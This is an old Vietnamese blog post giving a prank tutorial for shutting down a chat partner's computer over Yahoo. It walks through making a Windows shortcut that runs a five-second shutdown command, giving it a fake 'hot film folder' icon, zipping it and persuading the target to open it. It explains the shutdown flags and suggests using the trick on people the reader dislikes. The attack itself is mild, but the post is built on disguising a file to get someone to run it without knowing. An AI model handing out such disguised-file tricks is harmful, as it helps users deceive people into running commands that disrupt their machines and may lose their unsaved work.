Thứ Bảy, 13 tháng 8, 2011

Tắt Máy Người Khác Qua Yahoo

Bạn đang chat với một người mà mình không đội trời chung, hay đơn giản bạn chỉ muốn cho người bạn chat của mình một điều bất ngờ nho nhỏ. Thủ thuật sau đây sẽ giúp bạn tắt máy của người đang chat với mình (mình không chắc sẽ thành công 100%, điều này còn tùy thuộc vào bạn và người bạn chat với bạn)


Cách thực hiện như sau:


- Đầu tiên bạn click chuột phải vào vùng trống trên desktop, sau đó chọn New -> shortcut , ở ô "Type the location of item" bạn điền dòng lệnh sau vào: %windir%\system32\shutdown.exe -s -t 5 -c "bye bye ban nhe".





Sau đó ấn Next và đặt tên cho shortcut vừa tạo, xong chọn Finish.





Việc tiếp theo là thay đổi biều tượng cho shortcut để dụ đối phương click vào> Click phải vào shortcut > Properties > Chọn Change Icon, ấn Ok ở bảng thông báo hiện ra. Sau đó chọn một biểu tượng phù hợp với lời dụ dỗ của bạn và bấm OK, ở đây tui chọn là hình cái thư mục chứa film hot.





Sau đó bạn hãy nén shortcut đó lại thành file rar hoặc zip để gửi cho bạn chat, bạn phải nén lại vì nếu send trực tiếp shortcut thì nó sẽ gửi file "shutdown.exe" cho người ta > kế hoạch thất bại.





Việc còn lại bây giờ của bạn là cố gắng dụ dỗ bạn chát của mình nhận file bạn send cho và click vào đó





Giải thích ý nghĩa dòng lệnh trên


- "-s" : shutdown máy, nếu khg thix bạn có thể thay "-s" bng "-r" để restart hoặc "-l" để logoff


- "-t" : quy định khoảng thời gian đếm lùi xong khi click vào shortcut, ví dụ ở đây tui chọn là 5s "-t 5"


- "-c" : là lời nhắn nhủ hiện ra ở bảng thông báo shutdown, cú pháp: -c "lời nhắn nhủ"


Bạn có thể tìm hiểu thêm về lệnh shutdown bằng cách vào Run> Cmd> gõ shutdown/?


đừng hại người khác nha chỉ những ai mình ghét thui ma trò này chơi ngày cá tháng tư đc đó

0 nhận xét:

Đăng nhận xét